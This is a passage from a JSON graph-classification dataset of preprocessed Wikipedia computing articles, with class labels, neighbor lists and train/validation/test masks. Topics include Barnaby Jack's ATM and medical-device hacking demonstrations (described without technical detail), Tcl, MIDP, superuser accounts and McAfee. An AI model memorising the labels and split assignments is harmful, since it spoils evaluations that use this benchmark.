    "text": "Barnaby_Jack:barnaby jack barnaby michael douglas jack 22 november 1977 – 25 july 2013 new zealand hacker programmer computer security expert known presentation black hat computer security conference 2010 exploited two atms made dispense fake paper currency stage among notable works exploitation various medical devices including pacemakers insulin pumps jack renowned among industry experts influence medical financial security fields 2012 testimony led united states food drug administration change regulations regarding wireless medical devices time death jack director embedded device security ioactive black hat conference 2010 jack gave presentation jackpotting causing automated teller machines dispense cash without withdrawing bank account using bank card scenario first described fiction 1995 cyberpunk movie hackers jack gave demonstrations different kinds attacks involving physical access machines completely automated remote attacks cases malware injected operating system machines causing dispense currency fraudulently attacker command physical attack automated teller machine atm demonstrated jack attacker takes advantage physical access target machine uses flash drive loaded malware gain unauthorised access machines allowing control currency dispensing mechanism remote attack malware installed onto target system via exploited vulnerabilities remote management system notably use default passwords remote management tcp ports attacker executes malware causing target atm dispense currency mcafee focus 11 conference october 2011 las vegas working mcafee security jack first demonstrated wireless hacking insulin pumps one worn diabetic friend another model bench set demonstration interfacing pumps high-gain antenna obtained complete control pumps without prior knowledge serial numbers able cause demonstration pump repeatedly deliver maximum dose 25 units entire reservoir 300 units depleted amounting many times lethal dose delivered typical patient rsa security conference san francisco february 2012 using transparent mannequin demonstrated could wirelessly hack insulin pump distance 90 metres using high-gain antenna 2012 jack demonstrated ability assassinate victim hacking pacemaker scenario first explored fiction tv series homeland blog post broken hearts jack wrote hack even easier portrayed tv ridiculous n't need serial number jack demonstrated delivering deadly electric shock live 2012 breakpoint security conference melbourne game watch dogs similar hack shown black hat aiden pearce killing one main antagonists jack died week give presentation hacking heart implants black hat 2013 conference scheduled held las vegas june 2013 interview vice jack outlined presentation barnaby jack director embedded device security computer security firm ioactive developed software allowed remotely send electric shock anyone wearing pacemaker within 50-foot radius also came system scans insulin pumps communicate wirelessly within 300 feet allows hack without needing know identification numbers sets dish less insulin necessary sending patients hypoglycemic shock quickly excessive insulin dispensed ketoacidosis enough insulin dispensed period time.in presentation jack set outline vulnerabilities various medical devices well give safe demonstrations attacks certainly potential health risk jack found dead san francisco apartment 25 july 2013 girlfriend according coroner report jack died overdose heroin cocaine benadryl xanax 35 years old time death due attend black hat briefings hacking conference las vegas black hat general manager trey ford said everyone would agree life work barnaby jack legendary irreplaceable announced spot would replaced conference barnaby jack jackpotting technique atm multiple atms hacked forced spit amount cash triggered number events described jack 2010 black hat presentation used plot line 20th december 2015 episode series 2 cbs crime drama apart showing hack use explaining works episode also included nods barnaby jack work including naming hacked bank barnaby bank csi spinoff focused team fbi agents ex-blackhat hackers working stop various cyber threats across us",
    "neighbors": [
      161,
      2275,
      488,
      3532,
      4212,
      7449,
      7515,
      4956,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 689,
    "label": 2,
    "text": "AMSDOS:amsdos amsdos disk operating system 8-bit amstrad cpc computer various clones name contraction amstrad disk operating system amsdos first appeared 1984 cpc 464 added 3 inch disk drive cpc 664 cpc 6128 relatively fast efficient time amsdos quicker effective contemporaries amsdos provided built rom either supplied external disk drive machine rom depending model accessible built-in locomotive basic well firmware routines main function map cassette access routines built every cpc model disk drive enabled majority cassette-based programs work disk drive modification amsdos able support two connected disk drives amdos extends amstrad basic addition number external commands identified preceding nowiki /nowiki bar symbol following list external commands supported amsdos disk operating systems amstrad range included cp/m also bundled external disk drive built-in rom depending model ramdos allowed full 800k capacity single-density 3 ½ disks used providing suitable drive connected symbos",
    "neighbors": [
      2179,
      5359,
      7983,
      6675,
      2933,
      22,
      4409
    ],
    "mask": "Test"
  },
  {
    "node_id": 690,
    "label": 9,
    "text": "Mobile_Information_Device_Profile:mobile information device profile mobile information device profile midp specification published use java embedded devices mobile phones pdas midp part java platform micro edition java framework sits top connected limited device configuration cldc set lower level programming interfaces midp developed java community process first midp devices launched april 2001 core application programming interfaces defined underlying connected limited device configuration system contains java me-specific classes used i/o operations contains java me-specific classes used gui lcdui simple screen based approach single displayable always active time application user interface lcdui api provides small set displayables common mobile device user interfaces list alert textbox form canvas displayables device midp implementation control presentation layout displayable canvas low-level graphics surface application full control rendered although normally space reserved system areas like screen title indicators common mobile device uis since midp 2.0 canvas also supports full-screen mode allows use full screen graphics especially useful games lcdui also quite unique approach abstract operations called commands placement commands added displayable completely device implementation toolkit application programmer uses api specified command types indicate usage purpose command application user interface common types back exit item screen idea command abstraction make applications portable across various mobile devices application developers use command types properly indicate purpose operation device implementation places operation common location given type device specific user interface style may e.g specific key like back navigation key back commands button screen acronym lcdui actually in-house joke within jcp expert group though undefined midp specifications denotes limited capability device user interface joke no-one else really knew stood later book programming wireless devices java 2 platform micro edition gave definition common pseudo-definitions appeared liquid crystal display user interface would reflect fact mobile phones normally use lcds however api specifically tailored particular display technology also said lcd ui stands lowest common denominator due fact specific ui simplest possible design provides form persistent storage java database mobile device contains base classes java applications allows applications notified changes state following java specification requests selection optional jsrs added top midp implementation add extra functionalities optional jsrs guarantee midp handset implement apis wireless messaging api optional sending sms mms messages personal information management api optional access device address book to-do list calendar file connection optional package fcop one two optional packages defined jsr 75 java community process fileconnection api specified jsr 75 gives access local file systems devices like pda order overcome security issues midlet needs include requested file permission jad file midlet-permission property several different ways create midp applications code written plain text editor one use advanced ide netbeans intellij bundled java plugin eclipse plugins eclipseme user interface graphically laying forms create well providing many advanced features available simple text editor limitations may avoided using vendor-specific api midp 2.0 obviously reduces portability application midp developed java community process midp succeeded meep java 8",
    "neighbors": [
      2208,
      4960,
      6338,
      4324,
      10053,
      3561,
      3626,
      10410,
      5677,
      7246,
      9101,
      8882,
      9011,
      5143,
      3416,
      5659,
      6748,
      1533
    ],
    "mask": "Validation"
  },
  {
    "node_id": 691,
    "label": 4,
    "text": "Institute_of_Information_Security_Professionals:institute information security professionals institute information security professionals iisp independent non-profit body governed members principal objective advancing professionalism information security practitioners thereby professionalism industry whole primary aim institute provide universally accepted focal point information security profession institute information security professionals membership representing 8,000 individuals globally throughout industry academia government iisp offices evesham worcestershire southwark london institute hqs based evesham close cyber-hubs cheltenham malvern institute run members elected board directors dr alastair macwillson chairman one main activities act accreditation authority industry part government investment cyber security iisp consortium including crest rhul appointed ncsc provide certification uk government information assurance ia professionals consortium awarded licence issue cesg certified professional ccp mark based skills framework part certification scheme driven ncsc ia arm gchq full membership institute information security professional standard endorses knowledge experience professionalism individual field award membership levels competency-based sets apart purely knowledge-based qualifications awarded professionals demonstrate breadth depth knowledge substantial practical experience iisp number regional branches developed members based london united kingdom institute established 2006 information security professionals 2007 institute developed iisp skills framework framework describes range competencies expected information security information assurance professionals effective performance roles developed collaboration private public sector organisations academics security leaders 2012 part government investment cyber security iisp consortium appointed ncsc formally cesg provide certification uk government information assurance ia professionals iisp defined set information security skills skill levels skill definitions supplemented ncsc enable certification bodies make formal assessments others make informal assessments ia skill levels",
    "neighbors": [
      5423,
      4595,
      6648,
      2202,
      5373
    ],
    "mask": "Test"
  },
  {
    "node_id": 692,
    "label": 9,
    "text": "Tcl:tcl tcl pronounced tickle tee cee ell high-level general-purpose interpreted dynamic programming language designed goal simple powerful tcl casts everything mold command even programming constructs like variable assignment procedure definition tcl supports multiple programming paradigms including object-oriented imperative functional programming procedural styles commonly used embedded c applications rapid prototyping scripted applications guis testing tcl interpreters available many operating systems allowing tcl code run wide variety systems tcl compact language used embedded systems platforms full form several small-footprint versions popular combination tcl tk extension referred tcl/tk enables building graphical user interface gui natively tcl tcl/tk included standard python installation form tkinter tcl programming language created spring 1988 john ousterhout working university california berkeley originally born frustration according author programmers devising languages intended embedded applications tcl gained acceptance ousterhout awarded acm software system award 1997 tcl/tk name originally comes tool command language conventionally spelled tcl rather tcl tcl conferences workshops held united states europe tcl features include safe-tcl subset tcl restricted features tcl scripts harm hosting machine application file system access limited arbitrary system commands prevented execution uses dual interpreter model untrusted interpreter running code untrusted script designed nathaniel borenstein marshall rose include active messages e-mail safe-tcl included e-mail application/safe-tcl multipart/enabled-mail supported functionality safe-tcl since incorporated part standard tcl/tk releases syntax semantics tcl covered twelve rules known dodekalogue tcl script consists series command invocations command invocation list words separated whitespace terminated newline semicolon first word name command may built language found available library defined script subsequent words serve arguments command following example uses puts command display string text host console sends string hello world standard output device along appended newline character variables results commands substituted strings example uses set expr commands store result calculation variable note tcl use codice_3 assignment operator uses puts short put string print result together explanatory text codice_4 character introduces comment comments appear anywhere interpreter expecting command name seen examples one basic construct language command quoting mechanisms substitution rules determine arguments command processed one special substitution occurs parsing commands arguments final character line i.e. immediately newline backslash backslash-newline combination spaces tabs immediately following newline replaced single space provides line continuation mechanism whereby long lines source code wrapped next line convenience readers continuing normal argument processing word begins double-quote character codice_5 extends next double-quote character word thus contain whitespace semicolons without characters interpreted special meaning i.e. treated normal text characters word begins opening curly-brace character codice_6 extends next closing curly-brace character codice_7 inside curly braces forms substitution suppressed except previously mentioned backslash-newline elimination words enclosed either construct known bare words bare double-quoted words three types substitution may occur substitution proceeds left-to-right single scan word substituted text scanned possible substitutions however number substitutions appear single word tcl 8.5 onwards word may prefixed codice_12 causes word split apart constituent sub-words purposes building command invocation similar codice_13 sequence lisp quasiquote feature consequence rules result command may used argument command also operator command string concatenation language concatenates directly note unlike unix command shells tcl reparse string unless explicitly directed makes interactive use cumbersome scripted use predictable e.g. presence spaces filenames cause difficulties single equality sign codice_3 serves special role language double equality sign codice_15 test equality used expression contexts codice_16 command first argument codice_17 commands part standard library special place library replaced desired majority tcl commands especially standard library variadic codice_18 constructor scripted command procedures allows one define default values unspecified arguments catch-all argument allow code process arbitrary numbers arguments tcl statically typed variable may contain integers floats strings lists command names dictionaries value values reinterpreted subject syntactic constraints types demand however values immutable operations appear change actually return new value instead important commands refer program execution data operations usual execution control commands looping commands additionally controlled following commands codice_1 allows command script executed scope current innermost scope stack command script may call procedures use uplevel command net effect transforming call stack call tree originally implemented permit tcl procedures reimplement built-in commands like still ability manipulate local variables example following tcl script reimplementation command omitting exception handling codice_2 arranges one local variables current procedure refer variables enclosing procedure call global variables upvar command simplifies implementation call-by-name procedure calling also makes easier build new control constructs tcl procedures decr command works like built-in codice_54 command except subtracts value variable instead adding tcl 8.6 added built-in dynamic object system tcloo 2012 includes features tcl object oriented oo syntax 2012 various extension packages emerged enable object-oriented programming widespread existing tcl source code popular extensions include tcloo added build strong object oriented system also enable extension packages build object oriented abstractions using foundation release tcloo incr tcl updated use tcloo foundation tcl web server pure-tcl implementation http protocol server runs script top vanilla tcl interpreter apache rivet open source programming system apache http server allows developers use tcl scripting language creating dynamic web applications rivet similar php asp jsp rivet primarily developed damon courtney david welton massimo manghi harald oehlmann karl lehenbauer rivet use thousands publicly available tcl packages offer countless features database interaction oracle postgresql mysql sqlite etc interfaces popular applications gd graphics library tcl interfaces natively c language originally written framework providing syntactic front-end commands written c commands language including things might otherwise keywords codice_17 codice_25 implemented way command implementation function passed array values describe already substituted arguments command free interpret values sees fit digital logic simulators often include tcl scripting interface simulating verilog vhdl systemverilog hardware languages tools exist e.g swig ffidl automatically generate necessary code connect arbitrary c functions tcl runtime critcl reverse allowing embedding arbitrary c code inside tcl script compiling runtime dll tcl language always allowed extension packages provide additional functionality gui terminal-based application automation database access commonly used extensions include",
    "neighbors": [
      5634,
      515,
      11269,
      2576,
      6160,
      1556,
      8221,
      9245,
      546,
      8739,
      2603,
      5677,
      50,
      9780,
      1591,
      9783,
      1594,
      6718,
      10304,
      8771,
      10819,
      8262,
      1101,
      9808,
      595,
      84,
      8275,
      3159,
      7256,
      7769,
      10841,
      10851,
      102,
      9320,
      7274,
      3183,
      5743,
      8303,
      8304,
      9330,
      9848,
      3705,
      3193,
      5754,
      7292,
      9345,
      1666,
      3714,
      2181,
      3206,
      5255,
      1673,
      655,
      2191,
      10387,
      148,
      11413,
      5783,
      6810,
      155,
      3229,
      7326,
      2727,
      4777,
      6826,
      10413,
      3762,
      7346,
      692,
      7347,
      8883,
      190,
      6847,
      3267,
      5316,
      5833,
      6345,
      8909,
      7889,
      3284,
      4822,
      10971,
      8414,
      11486,
      3809,
      10470,
      11501,
      8430,
      10991,
      11506,
      2804,
      263,
      10506,
      8973,
      10510,
      9487,
      9490,
      5395,
      1812,
      9491,
      8473,
      10012,
      797,
      6941,
      8990,
      10526,
      11552,
      3876,
      7983,
      2864,
      7987,
      823,
      10043,
      10555,
      1347,
      1348,
      6982,
      1353,
      8524,
      2387,
      4437,
      9557,
      10584,
      8539,
      6493,
      865,
      2404,
      2916,
      6502,
      9575,
      11625,
      8554,
      9579,
      7022,
      5492,
      11125,
      3960,
      8057,
      7550,
      1920,
      2432,
      3969,
      3462,
      8582,
      9614,
      5521,
      8598,
      1435,
      10654,
      3487,
      10145,
      11682,
      1960,
      5032,
      1962,
      5546,
      8618,
      9128,
      6574,
      4528,
      2481,
      4529,
      5040,
      6074,
      7611,
      9666,
      963,
      8644,
      3013,
      4550,
      7629,
      8147,
      11219,
      3030,
      2519,
      4056,
      4057,
      477,
      8671,
      6626,
      4069,
      5612,
      10732,
      9714,
      8691,
      502,
      11259,
      2045,
      8702
    ],
    "mask": "Test"
  },
  {
    "node_id": 693,
    "label": 1,
    "text": "Svensk_mediedatabas:svensk mediedatabas svensk mediedatabas swedish media database search engine audiovisual works national library sweden database contains data tv radio video movies shown cinemas gramophone records cds cassette tapes video games multimedia smdb contains swedish broadcasts publications since 1979 also older works almost complete list swedish gramophone records starting end 19th century smdb also contains information special collections older advertisement films video recordings swedish theatres database contains information nearly eight million hours audiovisual content database contains information following starting 1979",
    "neighbors": [
      2901
    ],
    "mask": "Test"
  },
  {
    "node_id": 694,
    "label": 3,
    "text": "Palm_Vx:palm vx palm vx personal digital assistant made palm computing division 3com benefited sleek design low weight predecessor palm v increasing available storage 8 mb 114 grams one lightest models ever offered palm retail price launch us 399 soon release vx palm computing spun form palm inc.. result later-production palm vx units first palm devices longer carry 3com branding vx based palm v design primary difference two vx 8 megabytes ram compared v 2 megabytes one last palm models include memory slot also one first feature interaction email avantgo online programs vx powered motorola dragonball ez processor operating 20 mhz originally equipped palm os 3.3 later models came palm os 3.5 upgrade palm os 4.1 formerly offered sale palm website longer available device built rechargeable battery replaceable unless unit disassembled button top screen permitted access contrast menu also includes illumination feature causes screen backlit green glow however default backlight behaviour inverted text glowed background remained dark unfortunate side effect making backlit pictures appear negative images made display hard read ambient lighting level backlight screen crisp clear bright sunlight total darkness august 1 2000 palm announced release claudia schiffer edition palm vx palm vx cse featured blue brushed-metal finish instead usual silver color came pre-loaded healthetec diet exercise weight management software package abroad travel organization program device sold exclusively supermodel website retailed us 399 palm also released limited edition colored versions palm vx without special branding special edition offered gold millennium blue also palm cresenda edition blue faceplate reflecting corporate color cresenda wireless",
    "neighbors": [
      2308,
      10500,
      6790,
      3606,
      8982,
      6178,
      5164,
      7983,
      9013,
      5318,
      11337,
      9037,
      2258,
      1621,
      4832,
      4449,
      2285,
      1776,
      2420,
      8952,
      9598
    ],
    "mask": "Validation"
  },
  {
    "node_id": 695,
    "label": 3,
    "text": "Laplace_no_Ma:laplace video game mixture role-playing video game survival horror genres set vicinity boston massachusetts town called newcam modeled fictional city arkham created h. p. lovecraft horror part game lies exploration fictional weathertop mansion whose owner dabbled black magic game crpg features include character classes—dilettante medium detective scientist journalist—and player leave mansion walk around town go shops buy items needed defeat monsters complete game release famicom tsūshin scored super famicom version game 26 40",
    "neighbors": [
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 696,
    "label": 1,
    "text": "Astrodatabank:astrodatabank astrodatabank wiki website containing collection astrological data freely accessible database features birth details associated birth charts public figures mundane events collection started astrologer lois rodden 1979 astrodatabank currently owned maintained swiss company astrodienst published english 1979 lois rodden started publishing birth data book profiles women eventually led onto formation astrodatabank mark mcdonough developed astrodatabank database work using astrology birth data collected lois rodden 40 years research six months lois rodden died lois named pat taglilatelo successor data collection another lifelong collector edwin charles steinbrecher integrated database next two years july 2005 mcdonough gave richard smoot ownership company astrodatabank later bought swiss company astrodienst ag alois treindl 2008 converted wiki project made freely accessible astrodatabank wiki released 12 march 2009 72,271 pages english names astrodatabank astro-databank astrodatabank adb refer one project astrodatabank contents data wiki recommended purpose research related astrological studies project referred national council geocosmic research astrological research recommended astrological association great britain large collection verified astrological charts useful resource scientific research researchers imported astrodatabank birth chart data statistical package social sciences spss analysis claim astrodatabank sets standards rigorous astrological methodology meet social scientific research design standards astrodatabank used astrological predictions astrologers database served important source information related notable people research studies using astrodatabank replicate original results successful test conducted students statistics class lake forest college attempted information provided astrodatabank used work related history reference work contents astrodatabank details time event person related biography entry used also studying relation charts events public lives astrodatabank variety astrological data collections data includes birth details celebrities public figures royal births time dates significant events also included editors astrological data collectors contribute astrodatabank entries entries first reviewed main editor reliability notability publication astrodatabank birth entries ranked according lois rodden rating system requires full citation source notes detail reference origin datum collected entries updated reflect recent accurate information originally highest rating accuracy suggestion marion march aa category included distinguish data based personal memory supported birth certificate least reliable rating dd refers called dirty data third rate source datum speculative contradictory dubious dd rating apply entry multiple claims different birth data equally reliable sources research article cognitive simulation astrodatabank records using artificial intelligence system – aidos published technology simulation described important results discussed data astrodatabank used statistical studies astrology studying patterns account human behavior astrodatabank data referenced authors writers source information data magazines published books astrodatabank uses wiki software mediawiki self-created extensions provide astrological charts global rank astrodatabank august 2016 increase positive 6523",
    "neighbors": [
      5450,
      735
    ],
    "mask": "None"
  },
  {
    "node_id": 697,
    "label": 2,
    "text": "X00:x00 x00 popular dos-based fossil driver commonly used mid-1980s late 1990s even still used today fossil drivers mainly used run bbs software ms-dos x00 also run windows even linux dosemu environments allow fossil-aware ms-dos based applications function x00 developed raymond l. gwinn 1989 1993 final release version version 1.50 later beta version 1.53 added support baud rates 38400 x00 free non-commercial usage x00 included many enhancements ftc fossil revision 5 specifications later used fossil drivers adf netfoss gwinn moved develop replacement serial port driver os/2 called sio sio contained virtualized fossil vx00 could loaded applications needed fossil support",
    "neighbors": [
      9166,
      2789,
      6797,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 698,
    "label": 3,
    "text": "Processor_array:processor array processor array like storage array contains manages processing elements instead storage elements processor array following characteristics",
    "neighbors": [
      7151,
      4423
    ],
    "mask": "Test"
  },
  {
    "node_id": 699,
    "label": 2,
    "text": "PokerTH:pokerth pokerth open-source texas hold 'em simulator runs windows mac os x linux android pokerth written c++ using qt framework allows ten human players computer-controlled players filling enough humans players also play pokerth users online game ample settings players configure customize play pokerth project started 2006 felix hammer florian thauer version 0.1 released public allowed play flop well river version 0.2 released 4 october year followed 0.3 16 october version 0.2 game could play complete round version 0.4 released 4 april 2007 included completely new interface options dialog reprogrammed opponents june 2007 version 0.5 added network online play well sound effects internationalization started version 0.5 20 languages version 0.6 released 13 december 2007 prominent change addition dedicated game server online play well ipv6 support version 0.7 released 3 may 2009 adding support ten players new skinnable interface version 0.8 released 9 september 2010 adding option play online ranking games 2011 pokerth relicensed gplv2 agpl version 0.9 released january 4 2012 year development busy beta phase version introduces one frequently requested feature possibility rejoin internet games disconnection e.g trouble player internet connection players worry drop rank anymore furthermore around 15 new features lot bugfixes version 0.9.5 pokerth includes preliminary support android devices version 1.0 online log file analysis tool added sound support higher screen resolutions android devices support windows 8 desktop mode license change openssl exception windows 8 support gcrypt currently crashes windows 8 server re-factored using google protocol buffers basically enables use html5 clients latest stable version 1.1.2 released 1 september 2017 pokerth selected april 2013 hotpick linux format pokerth became quite popular freeware game downloaded alone sourceforge.net 2007 may 2017 2.8 million times article contains material translated german wikipedia article specifically version",
    "neighbors": [
      7983,
      6797,
      5470,
      823
    ],
    "mask": "Train"
  },
  {
    "node_id": 700,
    "label": 2,
    "text": "Superuser:superuser computing superuser special user account used system administration depending operating system os actual name account might root administrator admin supervisor cases actual name account determining factor unix-like systems example user user identifier uid zero superuser regardless name account systems implement role based security model user role superuser synonyms carry actions superuser account principle least privilege recommends users applications run ordinary account perform work superuser account capable making unrestricted potentially adverse system-wide changes unix-like computer oses linux root conventional name user rights permissions files programs modes single- multi-user alternative names include baron beos avatar unix variants bsd often provides toor root written backward account addition root account regardless name superuser always user id 0 root user many things ordinary user changing ownership files binding network ports numbered 1024 name root may originated root user account permission modify root directory unix system directory originally considered root home directory unix filesystem hierarchy standard recommends root home /root first process bootstrapped unix-like system usually called init runs root privileges spawns processes directly indirectly inherit parents privileges process running root allowed change user id another user done way back sometimes called dropping root privileges often done security measure limit damage possible contamination process another case login programs ask users credentials case successful authentication allow run programs privileges accounts often recommended no-one use root normal user account since simple typographical errors entering commands cause major damage system instead normal user account used either su substitute user sudo substitute user command used su approach requires user know root password sudo method requires user set power run root within /etc/sudoers file typically indirectly made member wheel adm admin sudo group number reasons sudo approach generally preferred – example leaves audit trail used command administrative operations performed oses macos linux distributions notably ubuntu automatically give initial user created ability run root via sudo – configure ask password administrative actions cases actual root account disabled default ca n't directly used mobile platform-oriented oss apple ios android superuser access inaccessible design generally security system exploited order obtain systems plan 9 superuser windows nt later systems derived windows 2000 windows xp windows server 2003 windows vista/7/8/10 must least one administrator account windows xp earlier one able elevate privileges superuser windows vista/7/8/10 via user account control windows xp earlier systems built-in administrator account remains hidden user administrator-equivalent account exists built-in administrator account created blank password poses security risks local users would able access computer via built-in administrator account password left blank account disabled default windows vista later systems due introduction user account control uac remote users unable access built-in administrator account windows administrator account exact analogue unix root account – administrator built-in administrator account user administrator account level privileges default user account created windows systems administrator account unlike macos linux windows vista/7/8/10 administrator accounts administrator accounts windows systems without uac insulate system pitfalls full root access one pitfalls includes decreased resilience malware infections avoid maintain optimal system security pre-uac windows systems recommended simply authenticate necessary standard user account either via password set built-in administrator account another administrator account windows vista/7/8/10 administrator accounts prompt appear authenticate running process elevated privileges usually user credentials required authenticate uac prompt administrator accounts authenticating uac prompt requires entering username password administrator standard user accounts windows xp earlier systems administrator accounts authentication required run process elevated privileges poses another security risk led development uac users set process run elevated privileges standard accounts setting process run administrator using runas command authenticating prompt credentials username password administrator account much benefit authenticating standard account negated administrator account credentials used blank password built-in administrator account windows xp earlier systems hence recommended set password built-in administrator account windows nt 2000 higher root user administrator account novell netware superuser called supervisor later admin openvms system superuser account os many older oses computers intended personal home use anyone using system full privileges many systems dos concept multiple accounts although others windows 95 allow multiple accounts could preferences profile – users still full administrative control machine",
    "neighbors": [
      5637,
      4616,
      13,
      3602,
      537,
      10788,
      5158,
      8742,
      5179,
      7739,
      9791,
      10318,
      10835,
      1632,
      107,
      2164,
      7804,
      5251,
      6797,
      11413,
      10392,
      7325,
      161,
      3750,
      8877,
      10933,
      4801,
      4298,
      1741,
      9424,
      3283,
      9939,
      2292,
      9972,
      8954,
      7947,
      8976,
      8978,
      5397,
      3873,
      4902,
      295,
      5927,
      7983,
      1844,
      9525,
      823,
      5433,
      5435,
      318,
      3395,
      9540,
      842,
      8012,
      8014,
      6480,
      6993,
      6484,
      8533,
      11097,
      3419,
      7515,
      4957,
      8539,
      5985,
      1379,
      5492,
      10631,
      3473,
      1426,
      2975,
      7583,
      6561,
      8612,
      2470,
      11184,
      4532,
      8631,
      8632,
      10170,
      11198,
      3024,
      4562,
      5082,
      10209,
      1511,
      6120,
      2538,
      491,
      4074,
      11246,
      11249,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 701,
    "label": 6,
    "text": "/dev/zero:/dev/zero read operations return many null characters 0x00 requested read operation unlike may used source sink data write operations succeed effects however commonly used purpose memory-mapped e.g. mmap virtual address space equivalent using anonymous memory i.e memory connected file /dev/zero introduced 1988 sunos-4.0 order allow mappable bss segment shared libraries using anonymous memory mid 1990s hp-ux introduced mmap flag map_anonymous maps anonymous memory directly without need open /dev/zero since late 1990s map_anonymous supported unix versions removing original purpose /dev/zero dd unix utility program reads octet streams source destination possibly performing data conversions process destroying existing data file system partition low-level formatting creating 1 mib file called foobar filled null characters note block size value given si decimal values e.g gb mb etc create 1 gb file one would simply type note instead creating real file zero bytes many file systems also support creation sparse files returns zeros upon reading use less actual space",
    "neighbors": [
      3841,
      8065,
      9507,
      7983,
      5397,
      3708,
      4925,
      8414
    ],
    "mask": "Test"
  },
  {
    "node_id": 702,
    "label": 5,
    "text": "Unidirectional_Lightweight_Encapsulation:unidirectional lightweight encapsulation unidirectional lightweight encapsulation ule data link layer protocol transportation network layer packets mpeg transport streams low protocol overhead especially suited ip satellite services every bit counts system example dvb-s however ule also used context dvb-c dvb-t theoretically every system based mpeg transport streams e.g. atsc ule engineered ip dvb ipdvb working group internet engineering task force ietf standardized rfc 4326 another encapsulation method multiprotocol encapsulation mpe developed standardized dvb project software linux kernel ulenet windows xp ipdvb working group maintains list ule implementations",
    "neighbors": [
      10242,
      3847,
      649,
      9868,
      3218,
      9365,
      10005,
      11413,
      5402,
      5531,
      3742,
      10271,
      9380,
      2085,
      9381,
      3751,
      3752,
      10924,
      562,
      2996,
      9909,
      7865,
      10171,
      4797,
      5181,
      3133,
      3006,
      5437,
      7364,
      2887,
      8265,
      2509,
      4687,
      5843,
      2904,
      5469,
      5470,
      5471,
      5472,
      8669,
      10341,
      10344,
      11112,
      751,
      367,
      8432,
      6651
    ],
    "mask": "Test"
  },
  {
    "node_id": 703,
    "label": 3,
    "text": "A_View_to_a_Kill_(video_game):view kill video game view kill name two separate computer games released 1985 based james bond film view kill first action game titled view kill computer game developed published domark available zx spectrum amstrad cpc commodore 64 oric 1 oric atmos msx second game titled james bond 007 view kill text-based adventure video game ms-dos macintosh apple ii computers developed angelsoft inc. published mindscape domark created action game split three separate sections inspired scenes film game starts famous movie intro sequence moving gunsight bond shooting towards camera first section set paris james bond commandeers taxi follow may day parachuted eiffel tower roadblocks police cars stop bond shoot pistol get way display three sections overhead map paris small 3d view car point view scanner showing may day height james must arrive right location catch lands second section james must help stacey sutton escape san francisco city hall fire room displayed side-on perspective james must collect useful objects get floors building keys open doors buckets water stop progress fire third final section james must collect code numbers stop detonation zorin bomb bond runs around mine avoiding rockfalls long drops among objects pick grapnel gun fire ropes upward climb safety plank wood bridge gaps may day also somewhere mine password system lets user play second third levels without completing first music commodore 64 version written antony tony crowther consists two covers one famous james bond theme monty norman second duran duran theme film mindscape published text adventure game angelsoft inc dos macintosh apple ii computers full title james bond 007 view kill future bond novelist raymond benson worked development game spawned follow-up game sinclair user gave zx spectrum version four stars five commodore user called commodore 64 version certainly one better 'game film implementations around commodore gave commodore 64 version two stars five criticized gameplay concepts writing sometimes programmers go overboard special effects expense could otherwise superb game view kill one example zzap 64 gave commodore 64 version 36 percent rating criticized game graphics music three separate gameplay modes writing focusing single gameplay style might better zzap 64 overall conclusion game powerful idea seems missed point zzap 64 reviewed commodore 64 version 1992 giving 19 percent rating writing problem licence potential turned diabolical arcade adventure questbusters wrote positive review praised game well-written text well-paced story criticized first level skullsmasher near impossible without information obtained film ... maybe designers figured people would n't play game unless 'd seen movie questbusters criticized game slow loading times response times major drawback ultimately concluded bond fans disappointed",
    "neighbors": [
      10931,
      9166,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 704,
    "label": 4,
    "text": "McAfee:mcafee mcafee llc formerly known mcafee associates inc. 1987–2014 intel security group 2014–2017 american global computer security software company headquartered santa clara california claims world largest dedicated security technology company company purchased intel february 2011 became part intel security division september 7 2016 intel announced strategic deal tpg capital convert intel security joint venture companies called mcafee deal closed april 3 2017 thoma bravo took minority stake new company intel maintains 49 stake company founded 1987 mcafee associates named founder john mcafee resigned company 1994 mcafee incorporated state delaware 1992 network associates formed 1997 merger mcafee associates network general pgp corporation helix software company restructured 2004 beginning sale magic solutions business remedy subsidiary bmc software early year mid-2004 company sold sniffer technologies business venture capital backed firm named network general name original owner sniffer technologies changed name back mcafee reflect focus security-related technologies among companies bought sold mcafee trusted information systems developed firewall toolkit free software foundation commercial gauntlet firewall later sold secure computing corporation mcafee result brief ownership tis labs/nai labs/network associates laboratories/mcafee research highly influential world open-source software organization produced portions linux freebsd darwin operating systems developed portions bind name server software snmp version 3 mcafee acquired calgary alberta canada-based fsa corporation helped company diversify security offerings away client-based antivirus software bringing board network desktop encryption technologies fsa team also oversaw creation number technologies leading edge time including firewall file encryption public key infrastructure product lines product lines individual successes including powerbroker written dean huxley dan freedman sold beyondtrust growth antivirus ware always outpaced growth security product lines fair say mcafee remains best known anti-virus anti-spam products august 19 2010 intel announced would purchase mcafee 48 share deal valued 7.68 billion january 6 2014 intel ceo brian krzanich announced consumer electronics show name change mcafee security intel security company red shield logo would remain firm continuing operate wholly owned intel subsidiary john mcafee longer involvement company expressed pleasure name longer associated software everlastingly grateful intel freeing terrible association worst software planet words words millions irate users however 2016 products still bore mcafee name company spun back intel april 4 2017 mcafee primarily develops digital-security tools personal computers server devices recently mobile devices mcafee brands products sub-products include",
    "neighbors": [
      2049,
      10245,
      4622,
      1052,
      550,
      2601,
      6699,
      10283,
      9775,
      8752,
      2611,
      11320,
      10297,
      1085,
      3133,
      9791,
      10308,
      6730,
      7755,
      10831,
      9817,
      8283,
      8795,
      94,
      2654,
      1634,
      4722,
      119,
      10872,
      9341,
      1662,
      127,
      7295,
      7809,
      8320,
      131,
      7304,
      6282,
      10385,
      5784,
      10392,
      156,
      9375,
      161,
      2721,
      164,
      2213,
      9894,
      6823,
      3243,
      2733,
      6834,
      7348,
      2749,
      10431,
      704,
      7362,
      9413,
      6345,
      202,
      7886,
      10455,
      1242,
      1245,
      3294,
      735,
      9959,
      6382,
      3825,
      9460,
      6911,
      9983,
      5891,
      8968,
      265,
      9488,
      4374,
      6431,
      5924,
      1318,
      8998,
      2859,
      3885,
      10546,
      4403,
      9523,
      3382,
      823,
      6971,
      9537,
      3395,
      4421,
      1355,
      10574,
      4945,
      6993,
      4435,
      8024,
      2907,
      9055,
      11104,
      9569,
      3941,
      11622,
      877,
      4464,
      3955,
      2425,
      3962,
      4475,
      1417,
      7563,
      3981,
      10637,
      8591,
      11664,
      5526,
      6550,
      11163,
      9630,
